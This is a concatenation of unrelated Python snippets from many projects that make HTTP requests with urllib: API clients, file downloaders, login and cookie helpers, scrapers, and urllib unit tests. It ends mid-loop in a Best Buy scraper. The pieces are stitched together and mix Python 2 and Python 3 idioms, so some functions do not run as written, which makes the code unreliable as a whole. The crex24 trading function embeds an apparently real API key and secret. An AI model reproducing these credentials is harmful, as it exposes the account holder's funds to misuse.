def fetch(method, uri, params_prefix=None, **params):
    """Fetch the given uri and return the contents of the response."""
    params = urlencode(_prepare_params(params, params_prefix))
    binary_params = params.encode('ASCII')

    # build the HTTP request
    url = "https://%s/%s.xml" % (CHALLONGE_API_URL, uri)
    req = Request(url, binary_params)
    req.get_method = lambda: method

    # use basic authentication
    user, api_key = get_credentials()
    auth_handler = HTTPBasicAuthHandler()
    auth_handler.add_password(
        realm="Application",
        uri=req.get_full_url(),
        user=user,
        passwd=api_key
    )
    opener = build_opener(auth_handler)

    try:
        response = opener.open(req)
    except HTTPError as e:
        if e.code != 422:
            raise
        # wrap up application-level errors
        doc = ElementTree.parse(e).getroot()
        if doc.tag != "errors":
            raise
        errors = [e.text for e in doc]
        raise ChallongeException(*errors)

    return response
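# A minimal usage sketch for fetch() above, assuming the surrounding Challonge
# wrapper module defines CHALLONGE_API_URL, get_credentials() and
# _prepare_params(); the tournament name and url are hypothetical.
tournament = fetch("POST", "tournaments",
                   params_prefix="tournament",
                   name="My Cup", url="my_cup")
print(tournament.read())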
def open_with_auth2(url):
    """
    Open a urllib2 request, handling HTTP authentication.

    In this version, user-agent is ignored.
    """
    scheme, netloc, path, params, query, frag = urlparse(url)
    if scheme in ('http', 'https'):
        auth, host = splituser(netloc)
    else:
        auth = None
    if auth:
        auth = "Basic " + unquote(auth).encode('base64').strip()
        new_url = urlunparse((scheme, host, path, params, query, frag))
        request = Request(new_url)
        request.add_header("Authorization", auth)
    else:
        request = Request(url)
    # request.add_header('User-Agent', user_agent)
    fp = urlopen(request)
    if auth:
        # Put authentication info back into request URL if same host,
        # so that links found on the page will work
        s2, h2, path2, param2, query2, frag2 = urlparse(fp.url)
        if s2 == scheme and h2 == host:
            fp.url = urlunparse((s2, netloc, path2, param2, query2, frag2))
    return fp
def _exec(self, action, params=None, post_params=None):
    """
    Execute an API action

    :param str action: The action to be performed. Translated to REST call
    :param dict params: Additional GET parameters for action
    :param dict post_params: POST parameters for action
    :returns dict: The JSON result of the call in a dictionary format
    """
    request_url = '%s/%s.%s' % (self.base_url, action, OneAll.FORMAT__JSON)
    if params:
        for ix, (param, value) in enumerate(params.items()):
            request_url += "%s%s=%s" % (('?' if ix == 0 else '&'), param, value)
    # urlopen requires bytes on Python 3, so encode the JSON body
    req = Request(request_url,
                  dumps(post_params).encode() if post_params else None,
                  {'Content-Type': 'application/json'})
    token = '%s:%s' % (self.public_key, self.private_key)
    auth = standard_b64encode(token.encode())
    req.add_header('Authorization', 'Basic %s' % auth.decode())
    req.add_header('User-Agent', self._get_user_agent_string())
    try:
        request = urlopen(req)
    except HTTPError as e:
        if e.code == 401:
            raise BadOneAllCredentials
        else:
            raise
    return loads(request.read().decode())
def make_request(self, url, method, params):
    """Perform HTTP request and return the response."""
    request = Request(url, str_to_bytes(params))
    for key, val in items(self.http_headers):
        request.add_header(key, val)
    response = urlopen(request)  # user catches errors.
    return response.read()
def test_ftp(self):
    class MockFTPWrapper:
        def __init__(self, data):
            self.data = data

        def retrfile(self, filename, filetype):
            self.filename, self.filetype = filename, filetype
            return io.StringIO(self.data), len(self.data)

    class NullFTPHandler(urllib.request.FTPHandler):
        def __init__(self, data):
            self.data = data

        def connect_ftp(self, user, passwd, host, port, dirs,
                        timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
            self.user, self.passwd = user, passwd
            self.host, self.port = host, port
            self.dirs = dirs
            self.ftpwrapper = MockFTPWrapper(self.data)
            return self.ftpwrapper

    import ftplib
    data = "rheum rhaponicum"
    h = NullFTPHandler(data)
    o = h.parent = MockOpener()

    for url, host, port, type_, dirs, filename, mimetype in [
        ("ftp://localhost/foo/bar/baz.html",
         "localhost", ftplib.FTP_PORT, "I",
         ["foo", "bar"], "baz.html", "text/html"),
        ("ftp://localhost:80/foo/bar/",
         "localhost", 80, "D",
         ["foo", "bar"], "", None),
        ("ftp://localhost/baz.gif;type=a",
         "localhost", ftplib.FTP_PORT, "A",
         [], "baz.gif", None),  # XXX really this should guess image/gif
    ]:
        req = Request(url)
        req.timeout = None
        r = h.ftp_open(req)
        # ftp authentication not yet implemented by FTPHandler
        self.assert_(h.user == h.passwd == "")
        self.assertEqual(h.host, socket.gethostbyname(host))
        self.assertEqual(h.port, port)
        self.assertEqual(h.dirs, dirs)
        self.assertEqual(h.ftpwrapper.filename, filename)
        self.assertEqual(h.ftpwrapper.filetype, type_)
        headers = r.info()
        self.assertEqual(headers.get("Content-type"), mimetype)
        self.assertEqual(int(headers["Content-length"]), len(data))
def parse_fq_factor(code):
    symbol = _code_to_symbol(code)
    try:
        request = Request(ct.HIST_FQ_FACTOR_URL % (symbol))
        request.add_header("User-Agent", ct.USER_AGENT)
        text = urlopen(request, timeout=20).read()
        text = text[1:len(text) - 1]
        text = text.decode('utf-8') if ct.PY3 else text
        # the endpoint returns pseudo-JSON; patch it up before parsing
        text = text.replace('{_', '{"')
        text = text.replace('total', '"total"')
        text = text.replace('data', '"data"')
        text = text.replace(':"', '":"')
        text = text.replace('",_', '","')
        text = text.replace('_', '-')
        text = json.loads(text)
        df = pd.DataFrame({'date': list(text['data'].keys()),
                           'fqprice': list(text['data'].values())})
        df['date'] = df['date'].map(_fun_except)  # for null case
        if df['date'].dtypes == object:
            df['date'] = df['date'].astype(str)
        df = df.drop_duplicates('date')
        df = df.sort_values('date', ascending=False)
        df = df.set_index("date")
        df['fqprice'] = df['fqprice'].astype(float)
        return df
    except Exception as e:
        print(e)
def _add_logo(self, episode, audio):
    # APIC part taken from http://mamu.backmeister.name/praxis-tipps/pythonmutagen-audiodateien-mit-bildern-versehen/
    url = episode.logo_url
    if url is not None:
        request = Request(url)
        request.get_method = lambda: "HEAD"
        try:
            response = urlopen(request)
            logo_type = response.getheader("Content-Type")
            if logo_type in ["image/jpeg", "image/png"]:
                img_data = urlopen(url).read()
                img = APIC(
                    encoding=3,  # 3 is for utf-8
                    mime=logo_type,
                    type=3,  # 3 is for the cover image
                    desc="Station logo",
                    data=img_data,
                )
                audio.add(img)
        except (HTTPError, URLError) as e:
            message = "Error during capturing %s - %s" % (url, e)
            logging.error(message)
        except Exception as e:
            raise e
def shorten(url):
    """
    Shorten the given URL using goo.gl.

    If settings.GOOGLE_URL_SHORTENER_API_KEY is set, it is used for the
    shortening call. For details, see:
    https://developers.google.com/url-shortener/v1/getting_started#auth
    """
    api_key = getattr(settings, 'GOOGLE_URL_SHORTENER_API_KEY', None)
    try:
        api_url = API_URL
        if api_key:
            api_url = '{}?key={}'.format(api_url, api_key)
        data = json.dumps({'longUrl': url})
        data = data.encode('utf-8')
        request = Request(api_url, data)
        request.add_header('Content-Type', 'application/json')
        r = urlopen(request)
        json_string = r.read().decode("utf-8")
        return json.loads(json_string)['id']
    except Exception as e:
        # fail silently
        logger = logging.getLogger('kawaz.core.utils')
        logger.exception("Failed to shorten `{}`".format(url))
        return url
def a(url):
    file = url.split('/')[-1]
    u = urlopen(url)
    meta = u.info()
    file_size = int(meta.get_all("Content-Length")[0])
    file_dl = 0
    block_sz = 8192
    if os.path.exists(file) and file_size == os.path.getsize(file):
        print("The file '%s' already exists." % file)
        exit()
    elif os.path.exists(file) and file_size != os.path.getsize(file):
        print("Resuming Download")
        f = open(file, "ab")
        dld = os.path.getsize(file)
        print("Downloading: {} Bytes: {}".format(file, file_size))
        # ask the server only for the missing byte range, then stream it in
        # blocks (the original re-requested the whole remainder on every loop)
        req = Request(url)
        req.add_header('Range', 'bytes=%s-%s' % (dld, file_size))
        u = urlopen(req)
        file_dl = dld
        while True:
            buffer = u.read(block_sz)
            if not buffer:
                break
            file_dl += len(buffer)
            f.write(buffer)
            status = "\r%10d  [%3.2f%%]" % (file_dl, file_dl * 100. / file_size)
            status = status + chr(8) * (len(status) + 1)
            sys.stdout.write(status)
            sys.stdout.flush()
        f.close()
        print("File: %s Downloaded Successfully" % (file))
        exit()
    f = open(file, 'wb')
    print("Downloading: {} Bytes: {}".format(file, file_size))
    while True:
        buffer = u.read(block_sz)
        if not buffer:
            break
        file_dl += len(buffer)
        f.write(buffer)
        status = "\r%10d  [%3.2f%%]" % (file_dl, file_dl * 100. / file_size)
        status = status + chr(8) * (len(status) + 1)
        sys.stdout.write(status)
        sys.stdout.flush()
    f.close()
    print("File: %s Downloaded Successfully" % (file))
def send_request(self, url, payload="", content_type="application/json",
                 method="GET", raw=False, timeout=30, silent=False):
    try:
        opener = build_opener(HTTPHandler)
        request = Request(url, data=bytes(payload, "UTF-8")
                          if sys.version_info >= (3,) else bytes(payload))
        request.add_header("Content-Type", content_type)
        request.get_method = lambda: method
        response = opener.open(request, timeout=timeout)
        buf = ""
        while 1:
            data = response.read()
            if not data:
                break
            buf += str(data, "UTF-8") if sys.version_info >= (3,) else data
        return json.loads(buf) if not raw else buf
    except socket.timeout:
        if not silent:
            print_color("Error: timed out while trying to communicate with %s:%d"
                        % (self.host, self.port))
    except URLError as e:
        if not silent:
            print_color("Error: %s while attempting to communicate with %s:%d"
                        % (e.reason, self.host, self.port))
    except ValueError as e:
        if not silent:
            print_color("Error: %s while trying to process result from Riak" % e)
    return None
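# Hypothetical call to send_request() above; it is assumed to live on a client
# object carrying the host/port attributes its error messages reference, and
# the stats URL is a placeholder for a Riak node.
stats = client.send_request("http://127.0.0.1:8098/stats")
if stats is not None:
    print(stats)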
def load(self, location, data=None, headers={}):
    if not location:
        raise LoginError()
    self.last_url = re.sub(r"https?:\/\/[^/]+", r"", location)
    heads = {"Accept-Encoding": "gzip, deflate",
             "User-Agent": self.core_cfg.get("User-Agent", "OTRS_US/0.0")}
    if "Cookies" in self.runt_cfg:
        heads["Cookie"] = self.runt_cfg["Cookies"]
    heads.update(headers)
    r = Request(location, data, headers=heads)
    try:
        pg = urlopen(r, timeout=60)
    except HTTPError as err:
        self.echo("HTTP Error:", err.getcode())
        return
    except Exception as err:
        self.echo(repr(err))
        return
    pd = pg.read()
    if pg.getheader("Content-Encoding") == "gzip":
        pd = decompress(pd)
    self.dump_data(pg, pd)
    if not self.check_login(pd.decode(errors="ignore")):
        raise LoginError(r.get_full_url())
    return self.parse(pd)
def charger(chemin):
    request = Request(chemin)
    request.add_header('Accept-encoding', 'gzip')
    print('Connecting...')
    response = urlopen(request)
    info = response.info()
    sys.stdout.write('Loading... ')
    sys.stdout.flush()
    temps = time.time()
    data = response.read()
    buf = BytesIO(data)
    temps = time.time() - temps
    print('done in %.3f seconds, %d bytes read' % (temps, len(data)))
    sys.stdout.write('Decompressing... ')
    sys.stdout.flush()
    temps = time.time()
    f = gzip.GzipFile(fileobj=buf)
    data = f.read()
    temps = time.time() - temps
    print('done in %.3f seconds, %d bytes decompressed' % (temps, len(data)))
    texte = data.decode(errors='ignore')
    return texte
def download(url, tor=False):
    def create_connection(address, timeout=None, source_address=None):
        sock = socks.socksocket()
        sock.connect(address)
        return sock

    if tor:
        if not HAVE_SOCKS:
            print_error("Missing dependency, install socks (`pip install SocksiPy`)")
            return None
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '127.0.0.1', 9050)
        socket.socket = socks.socksocket
        socket.create_connection = create_connection

    try:
        req = Request(url)
        req.add_header('User-agent', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
        res = urlopen(req)
        data = res.read()
    except HTTPError as e:
        print_error(e)
    except URLError as e:
        if tor and e.reason.errno == 111:
            print_error("Connection refused, maybe Tor is not running?")
        else:
            print_error(e)
    except Exception as e:
        print_error("Failed download: {0}".format(e))
    else:
        return data
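# Example use of download() above; print_error and the optional socks module
# are assumed from the surrounding script, and the URL is a placeholder.
data = download('http://example.com/sample.bin', tor=False)
if data is not None:
    with open('sample.bin', 'wb') as fp:
        fp.write(data)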
def cypher(query, **args):
    data = {"query": query, "params": args}
    data = json.dumps(data).encode('utf-8')  # urlopen needs bytes on Python 3
    req = Request(url="http://localhost:7474/db/data/cypher", data=data)
    req.add_header('Accept', 'application/json')
    req.add_header('Content-Type', 'application/json')
    try:
        resp = urlopen(req)
    except HTTPError as err:
        if err.code == 400:
            err = json.loads(err.read())
            return print_error('', query, err)
        else:
            print(err)
            return
    else:
        resp = json.loads(resp.read())
        columns = resp['columns']
        rows = resp['data']
        print_table(columns, rows)
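# Example call to cypher() above against the legacy Neo4j REST endpoint;
# the query and parameter are illustrative only.
cypher("MATCH (n) WHERE n.name = {name} RETURN n LIMIT 5", name="Alice")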
def data(self):
    if not hasattr(self, '_data'):
        request = URLRequest(self.url)

        # Look in the cache for etag / last modified headers to use
        # TODO: "expires" header could be supported
        if self.env and self.env.cache:
            headers = self.env.cache.get(('url', 'headers', self.url))
            if headers:
                etag, lmod = headers
                if etag:
                    request.add_header('If-None-Match', etag)
                if lmod:
                    request.add_header('If-Modified-Since', lmod)

        # Make a request
        try:
            response = urlopen(request)
        except HTTPError as e:
            if e.code != 304:
                raise
            # Use the cached version of the url
            self._data = self.env.cache.get(('url', 'contents', self.url))
        else:
            with contextlib.closing(response):
                self._data = response.read()
            # Cache the info from this request
            if self.env and self.env.cache:
                self.env.cache.set(
                    ('url', 'headers', self.url),
                    (response.headers.getheader("ETag"),
                     response.headers.getheader("Last-Modified")))
                self.env.cache.set(('url', 'contents', self.url), self._data)
    return self._data
def test_http_doubleslash(self):
    # Checks that the presence of an unnecessary double slash in a url does
    # not break anything. Previously, a double slash directly after the host
    # could cause incorrect parsing.
    h = urllib.request.AbstractHTTPHandler()
    o = h.parent = MockOpener()

    data = ""
    ds_urls = [
        "http://example.com/foo/bar/baz.html",
        "http://example.com//foo/bar/baz.html",
        "http://example.com/foo//bar/baz.html",
        "http://example.com/foo/bar//baz.html",
    ]

    for ds_url in ds_urls:
        ds_req = Request(ds_url, data)

        # Check whether host is determined correctly if there is no proxy
        np_ds_req = h.do_request_(ds_req)
        self.assertEqual(np_ds_req.unredirected_hdrs["Host"], "example.com")

        # Check whether host is determined correctly if there is a proxy
        ds_req.set_proxy("someproxy:3128", None)
        p_ds_req = h.do_request_(ds_req)
        self.assertEqual(p_ds_req.unredirected_hdrs["Host"], "example.com")
def make_request(self, url, method, params):
    """Makes an HTTP request and returns the response."""
    request = Request(url, params)
    for key, val in items(self.http_headers):
        request.add_header(key, val)
    response = urlopen(request)  # user catches errors.
    return response.read()
def upload(recipe, result, server, key=None):
    '''upload build'''
    branch = result.pop('branch', 'unknown')
    # FIXME: use urljoin
    request = Request('{}/build/{}/{}/{}'.format(
        server,
        quote(recipe['name']),
        quote(branch),
        quote('{} {}'.format(sys.platform, platform.machine()))))
    request.add_header('Content-Type', 'application/json')
    if key is not None:
        request.add_header('Authorization', key)
    try:
        urlopen(request, json.dumps(result).encode('UTF-8'))
    except HTTPError as exc:
        logging.error("The server couldn't fulfill the request.")
        logging.error('Error code: %s', exc.code)
        if exc.code == 400:
            logging.error("Client is broken, wrong syntax given to server")
        elif exc.code == 401:
            logging.error("Wrong key provided for project.")
        logging.error("%s", exc.read())
        return False
    except URLError as exc:
        logging.error('Failed to reach a server.')
        logging.error('Reason: %s', exc.reason)
        return False
    return True
def raw(ctx, method, url, datafp=None):
    """Do the raw http method call on url."""
    if method not in ("GET", "POST", "PUT", "DELETE"):
        raise ValueError("HTTP method '{}' is not known".format(method))
    if method in ("PUT", "DELETE"):
        raise NotImplementedError("HTTP method '{}' is not yet implemented".format(method))
    # TODO: we need real debugging
    print("DEBUG: {} {}".format(method, url))
    data = None
    request = Request(url)
    # prefer the Request.method attribute (Python 3.3+); else patch get_method
    if hasattr(request, 'method'):
        request.method = method
    else:
        request.get_method = lambda: method
    if method == "POST":
        data = datafp.read() if datafp is not None else b""
        request.add_header("Content-Type", "application/octet-stream")
    response = ctx.opener.open(request, data)
    if response.getcode() != 200:
        raise NotImplementedError("non 200 responses are not yet implemented")
    return response
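# Sketch of driving raw() above; ctx is assumed to be an object exposing an
# opener attribute, as the function body requires, and the URL is a placeholder.
import io
resp = raw(ctx, "POST", "http://example.com/api/blob", datafp=io.BytesIO(b"payload"))
print(resp.getcode(), resp.read())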
def _add_logo(self, show, audio):
    # APIC part taken from http://mamu.backmeister.name/praxis-tipps/pythonmutagen-audiodateien-mit-bildern-versehen/
    url = show.station.logo_url
    if url is not None:
        request = Request(url)
        request.get_method = lambda: 'HEAD'
        try:
            response = urlopen(request)
            logo_type = response.info().gettype()
            if logo_type in ['image/jpeg', 'image/png']:
                img_data = urlopen(url).read()
                img = APIC(
                    encoding=3,  # 3 is for utf-8
                    mime=logo_type,
                    type=3,  # 3 is for the cover image
                    desc=u'Station logo',
                    data=img_data
                )
                audio.add(img)
        except (HTTPError, URLError) as e:
            message = "Error during capturing %s - %s" % (url, e)
            self.log.error(message)
        except Exception as e:
            raise e
def __init__(self, name):
    """
    @param name: URL to be opened
    @keyword additional_headers: additional HTTP request headers to be added to the call
    """
    try:
        # Note the removal of the fragment ID. This is necessary, per the HTTP spec
        req = Request(url=name.split('#')[0])
        req.add_header('Accept', 'text/html, application/xhtml+xml')

        self.data = urlopen(req)
        self.headers = self.data.info()

        if URIOpener.CONTENT_LOCATION in self.headers:
            self.location = urlparse.urljoin(self.data.geturl(),
                                             self.headers[URIOpener.CONTENT_LOCATION])
        else:
            self.location = name
    except urllib_HTTPError:
        e = sys.exc_info()[1]
        from pyMicrodata import HTTPError
        msg = BaseHTTPRequestHandler.responses[e.code]
        raise HTTPError('%s' % msg[1], e.code)
    except Exception:
        e = sys.exc_info()[1]
        from pyMicrodata import MicrodataError
        raise MicrodataError('%s' % e)
def test_can_post_data(self):
    cas_base = 'https://example.com'
    url = 'https://example.com/abc'
    headers = {
        'soapaction': 'http://www.oasis-open.org/committees/security',
        'cache-control': 'no-cache',
        'pragma': 'no-cache',
        'accept': 'text/xml',
        'connection': 'keep-alive',
        'content-type': 'text/xml'
    }
    params = {'TARGET': url}
    uri = '{}cas/samlValidate?{}'.format(cas_base, urlencode(params))
    request = Request(uri, '', headers)
    request.data = get_saml_assertion('ticket')
    try:
        urlopen(request)
    except URLError:
        # As long as this isn't a TypeError, and the url request
        # was actually made, then we can assert that
        # get_saml_assertion() is good. This is to prevent an
        # issue introduced since Python 3:
        #
        #     POST data should be bytes or an iterable of bytes. It
        #     cannot be of type str.
        pass
def login(self, loc=None):
    if loc is None:
        loc = self.get_setting('BASE_LOCATION')
    login_url = self.get_setting('BASE_URL') + self.get_setting('LOGIN_LOCATION')
    cookies = HTTPCookieProcessor()
    opener = build_opener(cookies)
    opener.open(login_url)
    try:
        token = [x.value for x in cookies.cookiejar
                 if x.name == 'csrftoken'][0]
    except IndexError:
        raise IOError("No csrf cookie found")
    params = dict(username=self.get_setting('LOGIN_USERNAME'),
                  password=self.get_setting('LOGIN_PASSWORD'),
                  next=loc,
                  csrfmiddlewaretoken=token)
    encoded_params = urlparse.urlencode(params).encode('utf-8')
    req = Request(login_url, encoded_params)
    req.add_header('Referer', login_url)
    response = opener.open(req)
    if response.geturl() == login_url:
        raise IOError("Authentication refused")
    return opener, response
def authenticate(self, request):
    adhocracy_base_url = settings.PC_SERVICES["references"]["adhocracy_api_base_url"]
    user_path = request.META.get("HTTP_X_USER_PATH")
    user_token = request.META.get("HTTP_X_USER_TOKEN")
    user_url = urljoin(adhocracy_base_url, user_path)
    if user_path is None and user_token is None:
        return None
    elif user_path is None or user_token is None:
        raise exceptions.AuthenticationFailed(
            "Both `X-User-Path` and `X-User-Token` headers must be provided.")

    request = Request("%s/principals/groups/gods" % adhocracy_base_url)
    request.add_header("X-User-Path", user_path)
    request.add_header("X-User-Token", user_token)
    response = urlopen(request)

    if response.status == 200:
        content_type, params = parse_header(response.getheader("content-type"))
        encoding = params["charset"].lower()
        if content_type != "application/json":
            raise exceptions.AuthenticationFailed(
                "Adhocracy authentication failed due to a wrong response.")
        resource_as_string = response.read().decode(encoding)
        gods_group_resource = json.loads(resource_as_string)
        gods = gods_group_resource["data"]["adhocracy_core.sheets.principal.IGroup"]["users"]
        is_god = user_url in gods
        return AdhocracyUser(user_path, is_god), None
    else:
        raise exceptions.AuthenticationFailed(
            "Adhocracy authentication failed due to invalid credentials.")
def get_page_urls(url, user_agent=None):
    req = Request(url)
    if user_agent:
        req.add_header('User-Agent', user_agent)
    response = urlopen(req)
    urls = REGEX_URLS.findall(str(response.read()))
    return set(url[0].strip('"\'') for url in urls)
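# Example use of get_page_urls() above; REGEX_URLS is assumed to be a compiled
# pattern defined in the surrounding module, and the URL is a placeholder.
for found in get_page_urls('http://example.com', user_agent='Mozilla/5.0'):
    print(found)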
def getURLInfo(self, url=None):
    '''
    @see: IURLInfoService.getURLInfo
    '''
    if not url:
        raise InputError('Invalid URL %s' % url)
    assert isinstance(url, str), 'Invalid URL %s' % url
    url = unquote(url)
    try:
        with urlopen(url) as conn:
            urlInfo = URLInfo()
            urlInfo.URL = url
            urlInfo.Date = datetime.now()
            contentType = None
            for tag, val in conn.info().items():
                if tag == 'Content-Type':
                    contentType = val.split(';')[0].strip().lower()
                    break
            if not contentType or contentType != 'text/html':
                req = Request(url)
                selector = req.get_selector().strip('/')
                if selector:
                    parts = selector.split('/')
                    if parts:
                        urlInfo.Title = parts[len(parts) - 1]
                else:
                    urlInfo.Title = req.get_host()
                return urlInfo
            elif contentType == 'text/html':
                urlInfo.ContentType = contentType
                extr = HTMLInfoExtractor(urlInfo)
                try:
                    extr.feed(conn.read().decode())
                except (AssertionError, HTMLParseError, UnicodeDecodeError):
                    pass
                return extr.urlInfo
    except (URLError, ValueError):
        raise InputError('Invalid URL %s' % url)
def download(self, request):
    """ """
    mimetype = 'application/x-ofx'
    HTTPheaders = {'Content-type': mimetype, 'Accept': '*/*, %s' % mimetype}
    # py3k - ElementTree.tostring() returns bytes not str
    request = self.ofxheader + ET.tostring(request).decode()
    # py3k: urllib.request wants bytes not str
    request = Request(self.url, request.encode(), HTTPheaders)
    try:
        with contextlib.closing(urlopen(request)) as response:
            # py3k: urlopen returns bytes not str
            response_ = response.read().decode()
            # urllib2.urlopen returns an addinfourl instance, which supports
            # a limited subset of file methods. Copy response to a StringIO
            # so that we can use tell() and seek().
            source = StringIO()
            source.write(response_)
            # After writing, rewind to the beginning.
            source.seek(0)
            self.response = source
            return source
    except HTTPError as err:  # FIXME
        print(err.info())
        raise
def test_invalid_redirect(self):
    from_url = "http://example.com/a.html"
    valid_schemes = ["http", "https", "ftp"]
    invalid_schemes = ["file", "imap", "ldap"]
    schemeless_url = "example.com/b.html"
    h = urllib.request.HTTPRedirectHandler()
    o = h.parent = MockOpener()
    req = Request(from_url)
    req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT

    for scheme in invalid_schemes:
        invalid_url = scheme + "://" + schemeless_url
        self.assertRaises(
            urllib.error.HTTPError, h.http_error_302,
            req, MockFile(), 302, "Security Loophole",
            MockHeaders({"location": invalid_url}),
        )

    for scheme in valid_schemes:
        valid_url = scheme + "://" + schemeless_url
        h.http_error_302(req, MockFile(), 302, "That's fine",
                         MockHeaders({"location": valid_url}))
        self.assertEqual(o.req.get_full_url(), valid_url)
def http_request(self, request):
    """Processes cookies for a HTTP request.

    @param request: request to process
    @type request: urllib2.Request
    @return: request
    @rtype: urllib2.Request
    """
    COOKIE_HEADER_NAME = "Cookie"
    tmp_request = Request_(request.get_full_url(), request.data, {},
                           request.origin_req_host, request.unverifiable)
    self.cookiejar.add_cookie_header(tmp_request)
    # Combine existing and new cookies.
    new_cookies = tmp_request.get_header(COOKIE_HEADER_NAME)
    if new_cookies:
        if request.has_header(COOKIE_HEADER_NAME):
            # Merge new cookies with existing ones.
            old_cookies = request.get_header(COOKIE_HEADER_NAME)
            merged_cookies = '; '.join([old_cookies, new_cookies])
            request.add_unredirected_header(COOKIE_HEADER_NAME, merged_cookies)
        else:
            # No existing cookies so just set new ones.
            request.add_unredirected_header(COOKIE_HEADER_NAME, new_cookies)
    return request
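# A minimal sketch of wiring the handler above into an opener; the class name
# owning http_request() and its cookiejar attribute are assumptions, and
# Request_ is taken to be an alias of urllib's Request class.
import http.cookiejar
from urllib.request import build_opener

handler = CookieMergingHandler()  # hypothetical BaseHandler subclass defining http_request
handler.cookiejar = http.cookiejar.CookieJar()
opener = build_opener(handler)    # the opener now routes every request through http_request()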
def download(url, target):
    '''
    download(string, string) -> boolean

    Downloads content from a given URL and saves it to the given target
    location. Return True if the content was successfully downloaded, or
    False if the download fails (no content, target already exists).

    Keyword arguments:
    url    -- url of content (e.g: http://../hello.png)
    target -- filesystem location to save the content to

    return True if success, False if otherwise
    '''
    if path.exists(target):
        print("Error retrieving image: file target '%s' already exists." % target)
        return False

    opener = build_opener()
    req = Request(url)
    req.add_header('User-Agent', 'Mozilla/5.0')
    try:
        fp = opener.open(req)
        with open(target, "wb") as fo:
            fo.write(fp.read())
        return True
    except:
        print("Error fetching content: ", sys.exc_info()[0])
        return False
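# Example invocation of download() above; the url and target are placeholders.
if download('http://example.com/hello.png', '/tmp/hello.png'):
    print('saved /tmp/hello.png')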
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
import sys

if len(sys.argv) < 2:
    print("missing \"url\" argument, exiting...")
    exit()
else:
    url = sys.argv[1]

req = Request(url)
try:
    response = urlopen(req)
except HTTPError as e:
    print('The server couldn\'t fulfill the request.')
    print('Error code: ', e.code)
except URLError as e:
    print('We failed to reach a server.')
    print('Reason: ', e.reason)
else:
    print('Website is working fine')
def main():
    write_directory = 'raw_data'
    # simulating a web browser
    URL = 'https://api.covid19api.com/total/country/'
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}

    # making write_directory if it doesn't exist
    if not os.path.exists(write_directory):
        os.mkdir(write_directory)

    print('Reading countries.csv')
    try:
        csv_reader = csv.reader(open('countries.csv', 'r'), delimiter=',')
    except:
        print('Failed to read countries.csv')
        quit()

    # reading total no. of countries
    row_count = sum(1 for row in csv_reader)
    csv_reader = csv.reader(open('countries.csv', 'r'), delimiter=',')

    # fail counter initialization
    count = 0
    fail = 0
    fail_list = list()

    print('Downloading Data...')
    # browsing through each entry in the file
    for countries in csv_reader:
        country = countries[1]
        # print(country)
        reg_url = URL + country
        count = count + 1
        # downloading data, and accepting only valid data
        try:
            print('[{0:.2f}%] '.format((count / row_count) * 100) + reg_url)
            req = Request(url=reg_url, headers=headers)
            html = urlopen(req).read()
        except:
            print('\nFailed to retrieve data from ' + reg_url + '\n')
            fail = fail + 1
            fail_list.append(countries[0])
            continue
        try:
            data = pd.DataFrame(json.loads(html.decode()))
            data = data[['Confirmed', 'Deaths', 'Recovered', 'Active', 'Date']]
        except:
            print('\nReceived invalid response from ' + reg_url + '\n')
            fail = fail + 1
            fail_list.append(countries[0])
            continue
        filename = countries[0] + '.csv'
        data.to_csv(write_directory + '/' + filename, index=False)

    # printing fail report
    if fail > 0:
        print('No. of Failures : ' + str(fail))
        read = input('Press \'x\' to view them, or else press any other key : ')
        if read == 'x':
            print(fail_list)
def placeOrder(price):
    order = {
        "instrument": "CREX-BTC",
        "side": "sell",
        "volume": 0.0002,
        "price": price
    }

    baseUrl = "https://api.crex24.com"
    apiKey = "0515be61-853e-48ad-b6fa-424d768e2d6a"
    secret = "mCHnfAWVU+Q8V5yZQHaaAaaGIF+eIjn4joDQAFWIPUKPzsOFBbH18uWchNPOiPBL7L015YJDuLL3KYL9Lqb7RQ=="
    path = "/v2/trading/placeOrder"

    # sign the request: HMAC-SHA512 over path + nonce + body, keyed with the
    # base64-decoded secret
    body = json.dumps(order, separators=(',', ':'))
    nonce = round(datetime.datetime.now().timestamp() * 1000)
    key = base64.b64decode(secret)
    message = str.encode(path + str(nonce) + body, "utf-8")
    hmac3 = hmac.new(key, message, sha512)
    signature = base64.b64encode(hmac3.digest()).decode()

    request = Request(baseUrl + path)
    request.method = "POST"
    request.data = str.encode(body, "utf-8")
    request.add_header("Content-Length", len(body))
    request.add_header("X-CREX24-API-KEY", apiKey)
    request.add_header("X-CREX24-API-NONCE", nonce)
    request.add_header("X-CREX24-API-SIGN", signature)

    try:
        response = urlopen(request)
    except HTTPError as e:
        response = e
    status = response.getcode()
    body = bytes.decode(response.read())
    # print("Status code: " + str(status))
    # print(body)
    arr = json.loads(body)
    data = 0
    for key in arr:  # key is a dict
        for i in key:
            if i == "id":
                data = key[i]
    return data
def call_api():
    """
    Call an api using the Access Token
    :return: the index template with the data from the api in the parameter 'data'
    """
    if 'session_id' in session:
        user = _session_store.get(session['session_id'])
        if not user:
            return redirect_with_baseurl('/')

        if 'api_endpoint' in _config:
            user.api_response = None
            if "front-end" in request.args and user.front_end_access_token:
                access_token = user.front_end_access_token
            elif user.access_token:
                access_token = user.access_token
            else:
                user.api_response = None
                print('No access token in session')
                return redirect_with_baseurl("/")

            try:
                req = Request(_config['api_endpoint'])
                req.add_header('User-Agent', 'CurityExample/1.0')
                req.add_header("Authorization", "Bearer %s" % access_token)
                req.add_header("Accept", 'application/json')

                if 'subscription_key' in _config:
                    req.add_header('Ocp-Apim-Subscription-Key', _config['subscription_key'])
                    req.add_header('Ocp-Apim-Trace', 'true')

                response = urlopen(req, context=tools.get_ssl_context(_config))
                user.api_response = {'code': response.code, 'data': response.read()}
            except HTTPError as e:
                user.api_response = {'code': e.code, 'data': e.read()}
            except Exception as e:
                # Exception.message no longer exists on Python 3; use str(e)
                message = str(e) if str(e) else "unknown error"
                user.api_response = {"code": "unknown error", "data": message}
        else:
            user.api_response = None
            print('No API endpoint configured')

    return redirect_with_baseurl('/')
from urllib.request import Request, urlopen as uReq  # imports the snippet relies on
from bs4 import BeautifulSoup as soup
import random
import pandas as pd
from datetime import date

Date = []
Item_Name = []
Price = []
UPC = []
Page_Link = []

base_url = 'https://www.bestbuy.com'
for x in range(1, 33):
